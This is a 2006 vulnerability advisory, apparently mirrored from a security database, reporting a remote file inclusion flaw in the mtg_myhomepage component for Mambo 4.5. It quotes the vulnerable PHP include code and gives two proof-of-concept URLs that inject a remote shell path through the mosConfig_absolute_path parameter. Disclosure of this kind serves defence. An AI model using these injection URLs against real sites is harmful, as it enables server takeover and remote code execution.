Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13953
HistoryAug 21, 2006 - 12:00 a.m.

mtg_myhomepage Component For Mambo R.F.I

2006-08-2100:00:00
vulners.com
8

###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W #

    #            < www.Aria-security.net >                                            #
    #        Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                            #
    #                                                                    #
    ###########################################################################################

#Software: mtg_myhomepage Component For Mambo 4.5
#Vendor : http://www.kamgaing.com/
#Attack method: Remote File Inclusion

#Source:

if (file_exists

($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/'.$mosConfig_lang.'.php'))
include_once

($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/'.$mosConfig_lang.'.php');
else
include_once

($mosConfig_absolute_path.'/administrator/components/com_lmtg_myhomepage/language/english.php');

if ($mosConfig_mbf_content)
$iso_client_lang = MambelFish::discoverLanguage( $database );
else
$iso_client_lang = _LMTG_PRIMARY_LANG;


#Proof of Concept:
#install.lmtg_homepage.php?mosConfig_absolute_path= SHELL
#mtg_homepage.php?mosConfig_absolute_path= SHELL

#----------------------------------------------------------

#Contact : [email protected]